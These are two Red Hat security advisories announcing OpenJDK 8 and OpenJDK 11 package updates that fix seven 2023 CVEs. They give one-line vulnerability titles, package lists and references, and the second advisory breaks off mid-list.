An update for java-1.8.0-openjdk is now available for Red Hat Enterprise  
Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The java-1.8.0-openjdk packages provide the OpenJDK 8 Java Runtime  
Environment and the OpenJDK 8 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* The RSAPSSSignature implementation works with RSA keys via the SunRSASign  
provider. However, it did not fully check that the RSA key could be used by  
the provider before attempting to do so, leading to the possibility of  
errors being returned with custom security providers. The implementation  
now validates RSA keys and will allow other providers to handle such keys  
where it cannot. (RHBZ#2188024)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)  
2188024 - Backport JDK-8271199 [rhel-9.1.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el9_1.src.rpm

aarch64:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el9_1.aarch64.rpm

noarch:  
java-1.8.0-openjdk-javadoc-1.8.0.372.b07-1.el9_1.noarch.rpm  
java-1.8.0-openjdk-javadoc-zip-1.8.0.372.b07-1.el9_1.noarch.rpm

ppc64le:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el9_1.ppc64le.rpm

s390x:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el9_1.s390x.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el9_1.s390x.rpm

x86_64:  
java-1.8.0-openjdk-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-src-1.8.0.372.b07-1.el9_1.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.372.b07-1.el9_1.aarch64.rpm

ppc64le:  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.372.b07-1.el9_1.ppc64le.rpm

x86_64:  
java-1.8.0-openjdk-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-debugsource-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-demo-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-devel-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-fastdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-headless-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-slowdebug-debuginfo-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-src-fastdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm  
java-1.8.0-openjdk-src-slowdebug-1.8.0.372.b07-1.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-21930  
https://access.redhat.com/security/cve/CVE-2023-21937  
https://access.redhat.com/security/cve/CVE-2023-21938  
https://access.redhat.com/security/cve/CVE-2023-21939  
https://access.redhat.com/security/cve/CVE-2023-21954  
https://access.redhat.com/security/cve/CVE-2023-21967  
https://access.redhat.com/security/cve/CVE-2023-21968  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEgsNdzjgjWX9erEAQjwCw//ZVoLIV4we9R01XluXp+xN21yeLGMJpKA  
z6oWHWYtL/uthwAkk0BzLYzlsqUxcetZv4HebsWHPiAlXomkYoC0UI5gkfxWtlle  
n1pxUEqqgIEmSkut9bfqX4w9HeIo3Uaneys+FeBw8IYCMqnF7EOji30LoLIcjPyr  
nJK4SukS2bq2rrY3afM3UQyipHfGkrc9EhHfBftPFsHCeTmjzRngjqPYY6hL7mOh  
E2c/ihSdA9KMlWrG4p/x8XquMiaZC/IjLb7MC9C6Ul8s54oNhl7PWncf2ADj8Xgn  
86SR//4vzTkLnyRX240CtZqwF08nZIkwpO6l+Nx1zquJ9UfZ+p/EU0NG2h/JUyAI  
tB0Tsm3RETcQ95YgfAW6nFe4aUgt1eJCbt6UNqTZIqraC8vcHDXyzExsUtDK+9Gm  
wa7TkeVBef16EXysSXebCzO8kJox1HN20mrfe+j9W2XhW6DJtYjJ5rm9rkrujNRH  
Nmq2/0B9bvTOdoeOIgGgNRVZW6gICvshkYzLTGxezKzlOqm2CzzYC1jRBEsDkjvt  
HLyfhRiaBe2AuCYWdNBkCsLz8+j9MHYEowPcNOL42s27ssyjuRFyZ0FeBHOJLz/S  
PgjdsDaCr8NoMp0D++QWQD4/Ng25r7sEING6MIELIVF1BZfLLPWEyWrdVsBlCUjG  
HbewqKQd4Cg=  
=QPaK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1909-01

Red Hat Security Advisory 2023-1895-01 - The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: java-11-openjdk security update  
Advisory ID:       RHSA-2023:1895-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1895  
Issue date:        2023-04-20  
CVE Names:         CVE-2023-21930 CVE-2023-21937 CVE-2023-21938   
                   CVE-2023-21939 CVE-2023-21954 CVE-2023-21967   
                   CVE-2023-21968   
=====================================================================

1. Summary:

An update for java-11-openjdk is now available for Red Hat Enterprise Linux  
8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The java-11-openjdk packages provide the OpenJDK 11 Java Runtime  
Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: improper connection handling during TLS handshake (8294474)  
(CVE-2023-21930)

* OpenJDK: Swing HTML parsing issue (8296832) (CVE-2023-21939)

* OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
(CVE-2023-21954)

* OpenJDK: certificate validation issue in TLS session negotiation  
(8298310) (CVE-2023-21967)

* OpenJDK: missing string checks for NULL characters (8296622)  
(CVE-2023-21937)

* OpenJDK: incorrect handling of NULL characters in ProcessBuilder  
(8295304) (CVE-2023-21938)

* OpenJDK: missing check for slash characters in URI-to-path conversion  
(8298667) (CVE-2023-21968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of OpenJDK Java must be restarted for this update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187435 - CVE-2023-21930 OpenJDK: improper connection handling during TLS handshake (8294474)  
2187441 - CVE-2023-21954 OpenJDK: incorrect enqueue of references in garbage collector (8298191)  
2187704 - CVE-2023-21967 OpenJDK: certificate validation issue in TLS session negotiation (8298310)  
2187724 - CVE-2023-21939 OpenJDK: Swing HTML parsing issue (8296832)  
2187758 - CVE-2023-21938 OpenJDK: incorrect handling of NULL characters in ProcessBuilder (8295304)  
2187790 - CVE-2023-21937 OpenJDK: missing string checks for NULL characters (8296622)  
2187802 - CVE-2023-21968 OpenJDK: missing check for slash characters in URI-to-path conversion (8298667)

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
java-11-openjdk-11.0.19.0.7-1.el8_7.src.rpm

aarch64:  
java-11-openjdk-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.aarch64.rpm

ppc64le:  
java-11-openjdk-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.ppc64le.rpm

s390x:  
java-11-openjdk-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.s390x.rpm

x86_64:  
java-11-openjdk-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-demo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-javadoc-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-javadoc-zip-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-jmods-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-src-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-static-libs-11.0.19.0.7-1.el8_7.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_7.aarch64.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.aarch64.rpm

ppc64le:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-jmods-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-src-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-static-libs-fastdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.ppc64le.rpm

s390x:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-headless-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-jmods-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-src-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm  
java-11-openjdk-static-libs-slowdebug-11.0.19.0.7-1.el8_7.s390x.rpm

x86_64:  
java-11-openjdk-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-debugsource-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-demo-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-demo-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-fastdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-fastdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-slowdebug-11.0.19.0.7-1.el8_7.x86_64.rpm  
java-11-openjdk-devel-slowdebug-debuginfo-11.0.19.0.7-1.el8_7.x86_64.rpm  
